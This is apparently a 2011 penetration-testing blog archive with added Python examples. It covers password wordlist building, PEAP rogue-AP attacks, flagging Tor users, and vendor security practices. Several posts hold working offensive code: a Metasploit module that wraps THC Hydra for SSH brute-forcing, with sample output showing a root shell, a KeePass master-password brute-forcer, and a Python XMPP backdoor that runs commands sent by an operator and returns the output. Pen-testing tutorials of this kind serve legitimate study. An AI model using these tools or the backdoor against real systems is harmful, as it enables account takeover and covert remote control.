Monday, August 29, 2011

Clean a wordlist for use with password cracking tools and rules


This post is just a personal note. I am sure I will need this command in the future to clean up my wordlists :)

$ tr -d '[:punct:][:digit:][:blank:]' < dirtyfile.txt | tr 'A-Z' 'a-z' | tr -cs '[:alpha:]' '\n' | awk 'length($0) >= 4' | sort -u > cleanfile.txt

Same result as the long pipeline, with the redundant steps (cat, the second tr A-Z a-z, the sed/strings round trip) folded together: punctuation, digits and blanks are deleted, the text is lower-cased, anything left that is not a letter becomes a line break, tokens shorter than four characters are dropped (what strings(1) did by default) and the list is sorted and de-duplicated.

Monday, August 22, 2011

Password cracking and creating custom wordlists

These days almost everybody has a decent graphics card that can be used to crack passwords (an Nvidia card through the CUDA framework, for example), and it speeds things up enormously.

Computing power is really helpful, but it cannot beat a well-crafted custom wordlist. Cracking MD5 hashes may be fast, but try doing the same against slower hashes :)

My advice is simple: know your target as well as you can! Their culture, their language, their people, what they do for a living, etc., and build a custom dictionary on top of that.

You may also find this old post by the Pauldotcom crew useful. The idea is to build the dictionary from the target's website, since in theory it is a valuable source of the vocabulary used inside the company.

I did some tests following the tips above, using Cryptohaze Multiforcer (a CUDA-based multi-hash cracker) to crack the passwords. The results were spectacular: I ended up with a 400MB wordlist (approx. 35M words) and it found many of the passwords in a few minutes :)
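The two steps described in this post and in the wordlist-cleaning note above (pull the vocabulary out of the target's pages, then normalise it into a cracker-ready list) as one added Python example. It is not the post's shell pipeline and not the Pauldotcom script: it splits words on digits and punctuation rather than deleting them, keeps accented (Unicode) letters that tr in the C locale would drop, and orders site words by frequency so the cracker tries the target's most common vocabulary first. The two HTML pages and the company name "Acme Solar" are constructed for the example.

```python
"""Build a target-specific wordlist from a site's text, then clean it."""
import re
from collections import Counter
from html.parser import HTMLParser

# Runs of letters only: digits, punctuation and '_' split words. Unlike
# tr -cs '[:alpha:]' in the C locale, Unicode letters are kept.
WORD_RE = re.compile(r"[^\W\d_]+")


class _TextExtractor(HTMLParser):
    """Collect visible text and skip <script>/<style> bodies."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def html_to_text(html):
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join(parser.chunks)


def clean_words(text, min_len=4):
    """Normalise free text into a sorted, unique, lower-case wordlist.
    min_len=4 mirrors the default minimum of strings(1)."""
    return sorted({w.lower() for w in WORD_RE.findall(text) if len(w) >= min_len})


def site_wordlist(pages, min_len=4):
    """Words from HTML pages, most frequent first, so the vocabulary the
    target uses most is tried first by the cracker."""
    counts = Counter()
    for html in pages:
        for w in WORD_RE.findall(html_to_text(html)):
            if len(w) >= min_len:
                counts[w.lower()] += 1
    return [w for w, _ in counts.most_common()]


# Constructed sample pages standing in for a crawl of the target's website.
SAMPLE_PAGES = [
    "<html><head><title>Acme Solar - Home</title><style>body{margin:0}</style></head>"
    "<body><h1>Welcome to Acme Solar!</h1><p>Founded in 1998, Acme Solar builds "
    "photovoltaic panels in Valencia. Call 555-0100.</p>"
    "<script>var tracker = 'acme';</script></body></html>",
    "<html><body><p>Acme Solar careers: join our Valencia team.</p></body></html>",
]

if __name__ == "__main__":
    for word in site_wordlist(SAMPLE_PAGES):
        print(word)
```

Feed the output to the cracker's rule engine (case toggling, digit and year suffixes, leet substitutions) rather than generating those variants here; the value of the list is the base vocabulary, the rules multiply it.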

Thursday, August 18, 2011

Attacking PEAP wireless networks

Great video, as always, posted by Vivek Ramachandran on SecurityTube.

This time Vivek explains how to attack PEAP networks. In short, a honeypot is set up with a rogue AP and a RADIUS server in order to capture the inner MS-CHAPv2 challenge and response (802.1X/EAP) that an unaware client sends when it connects to our system. This only works because the client does not validate the RADIUS server's certificate; a supplicant configured to check it will refuse to start the inner authentication.

Once we have captured the challenge and response sent to our own RADIUS server, we can feed them to asleap, written by Joshua Wright, which recovers the password with a dictionary attack.

WLAN Security Megaprimer 33 from Vivek Ramachandran on Vimeo.

Wednesday, August 10, 2011

Trolling the Tor Script Kiddies

Following a tweet by insit0r about script kiddies abusing Tor to attack web sites, and about blocking them, I thought we should go a bit further and be evil with them.

My first comment was not to block all the Tor exit nodes, since the attacker will simply switch to another anonymizer and we will lose visibility. In my opinion it is better to flag the connection as a policy violation than to block it outright: a rejected connection tells us nothing about the attacker's intentions and skills, whereas a flagged one can be correlated and tracked across our infrastructure.

That is plain passive monitoring and information gathering, but we could put on our grey hat and do something a little bit evil to our attackers :)

What about sending some countermeasures back to the attacker, taking advantage of the fact that they do not know they have been discovered?

Following this talk in Spanish by Roberto Martinez, I thought we could use ModSecurity to inject content into the pages when we detect that someone is connecting through Tor. This gives us the following possibilities:

Note: Searching on Google I found this directory that lists all the Tor exit nodes. Now we have all the tools to troll the script kiddies that want to attack our website.
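The passive half of the idea (flag and correlate, do not reject) as an added Python example. This is not from the post and is not ModSecurity configuration; it assumes an exit-node list with one address per line and '#' comments, and combined-format access log lines. The list and the log lines below are constructed from documentation address ranges, not real relays.

```python
"""Flag, rather than block, requests that arrive through Tor exit nodes."""
import ipaddress
import re

EXIT_LIST = """\
# Tor exit nodes (constructed sample, documentation ranges only)
192.0.2.10
192.0.2.11
198.51.100.7
not-an-address
"""

LOG_LINES = [
    '192.0.2.10 - - [10/Aug/2011:21:03:11 +0200] "GET /admin.php?id=1%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [10/Aug/2011:21:03:12 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Aug/2011:21:03:15 +0200] "POST /login HTTP/1.1" 302 0 "-" "python-requests/0.6"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def load_exit_nodes(text):
    """Parse the list into a set of ip_address objects; malformed lines are
    skipped so one bad entry cannot disable the check."""
    nodes = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            nodes.add(ipaddress.ip_address(line))
        except ValueError:
            continue
    return nodes


def classify(line, exit_nodes):
    """One log line -> event dict tagged 'tor-exit' or 'direct'; None when the
    line does not parse (no client address to decide on)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        ip = ipaddress.ip_address(m.group("ip"))
    except ValueError:
        return None
    return {
        "ip": str(ip),
        "time": m.group("ts"),
        "request": m.group("req"),
        "status": int(m.group("status")),
        "tag": "tor-exit" if ip in exit_nodes else "direct",
    }


def tor_events(lines, exit_nodes):
    """The flagged events: what gets correlated and tracked instead of dropped."""
    events = (classify(l, exit_nodes) for l in lines)
    return [e for e in events if e and e["tag"] == "tor-exit"]


if __name__ == "__main__":
    nodes = load_exit_nodes(EXIT_LIST)
    for ev in tor_events(LOG_LINES, nodes):
        print("%(time)s tor-exit %(ip)s %(request)r -> %(status)d" % ev)
```

In ModSecurity terms this is a rule whose action is pass,log with a tag, not deny: the request is served as usual and the alert is what feeds the correlation (and, later, the content injection). ModSecurity 2.7 and later can match the same exit-node file directly with @ipMatchFromFile.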

Friday, August 5, 2011

Brute-forcing SSH accounts with THC Hydra and Metasploit

I have written a simple auxiliary module for Metasploit that brute-forces SSH accounts with THC Hydra and loads the resulting sessions into Metasploit.

The approach is as simple as executing Hydra from the shell and recovering the valid credentials from its output with a regular expression. After that, we only have to open a new session with the SSH libraries available in the framework.

As a side note, like any external program, this module cannot be used through a pivot, but the code can be modified to call hydra through a wrapper such as tsocks and then scan via the framework's Socks4a server module:

%x[tsocks hydra -f -o #{logfile} -w #{timeout} -t #{threads} -s #{rport} -C #{credentials} #{ip}  ssh2]
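The "run hydra, regex the output, keep the valid pairs" step of the module as an added example in Python rather than the module's Ruby; it is not the module's code. It assumes hydra's -o file holds one hit per line in the form `[22][ssh] host: 192.0.2.5   login: root   password: root` after a '#' comment header, and that the -C file is login:password per line. The sample output below is constructed.

```python
"""Parse THC Hydra's output file and rebuild the command the module runs."""
import re

HYDRA_RESULT = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\]\s+host:\s*(?P<host>\S+)"
    r"\s+login:\s*(?P<login>\S+)\s+password:\s?(?P<password>.*)$"
)

# Constructed sample of a hydra -o file (header line plus two hits).
SAMPLE_OUTPUT = """\
# Hydra v7.1 run at 2011-08-05 19:05:58 on 192.0.2.5 ssh (constructed sample)
[22][ssh] host: 192.0.2.5   login: root   password: root
[22][ssh] host: 192.0.2.5   login: backup   password: Summer 2011
"""


def parse_hydra_output(text):
    """Return (host, port, login, password) tuples for every hit in text.
    Comment and status lines do not match the pattern and are skipped;
    the password keeps inner spaces and only loses the trailing newline."""
    hits = []
    for line in text.splitlines():
        m = HYDRA_RESULT.match(line)
        if m:
            hits.append((m.group("host"), int(m.group("port")),
                         m.group("login"), m.group("password").rstrip()))
    return hits


def credentials_file(pairs):
    """Serialise login/password pairs in hydra's -C (colon separated) format."""
    return "".join("%s:%s\n" % (login, password) for login, password in pairs)


def hydra_argv(ip, rport, credentials, logfile, threads=8, timeout=30, via_tsocks=False):
    """argv for the module's hydra call: a list (no shell) so option values
    cannot be injected, optionally wrapped in tsocks for use through a pivot.
    Current hydra names the module 'ssh'; older releases used 'ssh2' as in the post."""
    argv = ["hydra", "-f", "-o", logfile, "-w", str(timeout), "-t", str(threads),
            "-s", str(rport), "-C", credentials, ip, "ssh"]
    return (["tsocks"] + argv) if via_tsocks else argv


if __name__ == "__main__":
    print(" ".join(hydra_argv("192.0.2.5", 22, "/tmp/credentials", "/tmp/hydra.out", via_tsocks=True)))
    for host, port, login, password in parse_hydra_output(SAMPLE_OUTPUT):
        print("Valid credentials found: %s:%d %s %s" % (host, port, login, password))
```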

NOTE: Some of the code is borrowed from the existing SSH auxiliary modules.

Example output:

msf auxiliary(ssh_hydra) > info

       Name: Scanning SSH servers with Hydra
     Module: auxiliary/scanner/ssh/ssh_hydra
    Version: 1
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:

Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  CREDENTIALS  /tmp/credentials  yes       colon separated list of credentials
  RHOSTS       X.X.X.X           yes       The target address range or CIDR identifier
  RPORT        22                yes       The target port
  TASKS        8                 yes       number of connexions in parallel
  TIMEOUT      30                yes       timeout for the responses

  This module will launch THC hydra to brute-force the ssh credentials
  and then open the sessions with the valid ones.

msf auxiliary(ssh_hydra) > run

[*] X.X.X.X:22, SSH server version: SSH-1.99-OpenSSH_4.4
[*] Attacking X.X.X.X
[*] X.X.X.X:22  /tmp/credentials - Calling Hydra

[*] Valid credentials found: X.X.X.X root root
[*] Command shell session 1 opened (Y.Y.Y.Y:35009 -> X.X.X.X:22) at Fri Aug 05 19:06:00 +0200 2011
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module can be found here: ssh_hydra.rb

Thursday, August 4, 2011

[Spanish] Offensive Security talk by Roberto Martinez

The following video corresponds to a talk presented by Roberto Martinez at the Campus Party in Mexico.

I highly recommend watching this video, since it shows how security should be done in real life, instead of installing devices and ticking checkboxes :)

I would summarise the talk as:

  • Information gathering
  • Intelligence
  • Honeypots
  • Feed all your information into a SIEM to monitor the network activity.
  • Deception and counter-attacks: resource exhaustion, dropping exploits.
  • Deanonymising and tracking attackers: decloaking, and using our own DNS to track the attacker.

In my opinion, I would also add darknets or sinkholes to gain extra intelligence :)

[Spanish] Attacking 2G mobile communications

Via rootedcon, who have published more videos from Rooted CON 2011.

The following video explains how to perform attacks on 2G mobile networks using OpenBSC.

David Pérez y José Picó - Un ataque práctico contra comunicaciones móviles (A practical attack against mobile communications) (Rooted CON 2011) from rootedcon on Vimeo.

Wednesday, August 3, 2011

Brute-forcing Keepass password key-chains

From the website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

This open source password manager is available on Windows, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these database files during a pen-test.

Looking for ways to brute-force the master password, I stumbled across this Python implementation that is able to read the file and dump its contents. It should not be too slow, since it uses pycrypto, whose primitives are implemented in C.

The code is fairly simple and expects the list of candidate passwords on standard input. One possibility is to let John the Ripper generate them (its --stdout mode) :)

You can find the code below.

#!/usr/bin/env python

# reads a list of candidate master passwords from the standard input
# john the ripper may be used to feed the application (john --stdout)

from keepass import kpdb
import sys

if len(sys.argv) != 2:
    sys.stderr.write("usage: %s database.kdb < wordlist\n" % sys.argv[0])
    sys.exit(1)

for line in sys.stdin:
    passwd = line.rstrip("\r\n")   # strip the newline only, keep spaces inside the candidate
    try:
        db = kpdb.Database(sys.argv[1], passwd)
    except ValueError:             # wrong master password: kpdb raises ValueError
        continue
    print "Valid password found for %s : %s" % (sys.argv[1], passwd)
    break

Tuesday, August 2, 2011

Software vendors living in the 90s and the big firewall

This post is yet another "my software is behind the firewall" rant; you can safely skip it because you won't miss a thing :)

I already tweeted about this software vulnerability, but reading the vendor's response in the advisory I thought I had to give my two cents.

Basically, their response boils down to this (please note the sarcasm):
Our software is not meant to be on the Internet and it should be safe behind the big firewall of your organization. Therefore, we do not care if we have a remote buffer overflow that requires no authentication.

To put it into perspective, the software in question is a licensing server used by many vendors across the board (MATLAB, Simulink, etc.) and widely deployed in universities and other research institutions, which are their main customers.

So, why do I think their response was inappropriate and, perhaps, idiotic?

  • One of the main characteristics of their customers is the openness of their networks, because they have students and researchers who move around and need to use the licensing software from all over the network. What does that mean? There is no perimeter and the firewall is useless!
  • Since the license server is inside the network and trusted by the customer, chances are that the software is running with privileges on a server that is part of the Windows domain. What does that mean? The vulnerability can be used by an attacker to gain further access to the domain and perhaps domain admin privileges as a side effect.
  • Their answer is so 90s that it makes everybody think they do not care about security and lack all the relevant skills.
  • Since they lack security skills, perhaps they also lack secure coding practices, and there are more vulnerabilities hidden in their software.

Monday, August 1, 2011

Python XMPP backdoor

Following the previous post, I thought it would be nice to find alternative ways to code a backdoor while using Python as the scripting language.

One of my first ideas was to write a simple backdoor that would use some kind of IM (instant messaging), like the script kiddies do with IRC. Yes, I can comfortably sit at my desk and wait until one of my XMPP bots pops up in my list of online contacts!

I found some easy examples of how to build a bot with the python-xmpp library and I reused most of the code. Pretty script kiddie altogether :)
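The core of such a bot, as an added example that is not the post's code: the part that decides whose messages are obeyed and turns a message body into a command and a reply, kept independent of the XMPP library so it can be exercised offline. The network loop under `__main__` uses python-xmpp (xmpppy) calls as in the post (`xmpp.Client`, `auth`, `RegisterHandler`, `sendInitPresence`, `Process`); the operator JID in `OPERATORS` is a placeholder, and the JID and password are taken from the command line.

```python
"""Command handler for an XMPP control bot."""
import shlex
import subprocess

# Bare JIDs allowed to issue commands (placeholder value). Anyone else is
# ignored silently so the bot does not reveal itself to strangers.
OPERATORS = {"operator@example.org"}


def bare_jid(jid):
    """'user@host/resource' -> 'user@host'. Lower-casing the whole JID is
    acceptable here because the allow-list is ours and written in lower case."""
    return jid.split("/", 1)[0].lower()


def handle_command(sender, body, timeout=10):
    """Return the reply text for one incoming message, or None to stay silent."""
    if bare_jid(sender) not in OPERATORS:
        return None
    body = body.strip()
    if not body:
        return None
    if body == "!ping":
        return "pong"
    try:
        argv = shlex.split(body)
    except ValueError as exc:          # unbalanced quotes
        return "parse error: %s" % exc
    try:
        # No shell: the message is split into argv, so no extra interpretation.
        done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except FileNotFoundError:
        return "no such command: %s" % argv[0]
    except subprocess.TimeoutExpired:
        return "timeout after %ds" % timeout
    output = done.stdout + done.stderr
    return output[-4000:] or "(no output, exit %d)" % done.returncode


if __name__ == "__main__":
    import sys
    import xmpp  # python-xmpp (xmpppy), the library used in the post

    jid = xmpp.protocol.JID(sys.argv[1])
    client = xmpp.Client(jid.getDomain(), debug=[])
    client.connect()
    client.auth(jid.getNode(), sys.argv[2], resource="bot")

    def on_message(conn, msg):
        reply = handle_command(str(msg.getFrom()), msg.getBody() or "")
        if reply is not None:
            conn.send(xmpp.protocol.Message(to=msg.getFrom(), body=reply))

    client.RegisterHandler("message", on_message)
    client.sendInitPresence()  # this is the "bot pops up in my contact list" moment
    while True:
        client.Process(1)
```

The reply is truncated because XMPP message bodies are meant to be small; an operator who needs a large file would pull it over a separate channel rather than through chat messages.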

The code can be found here: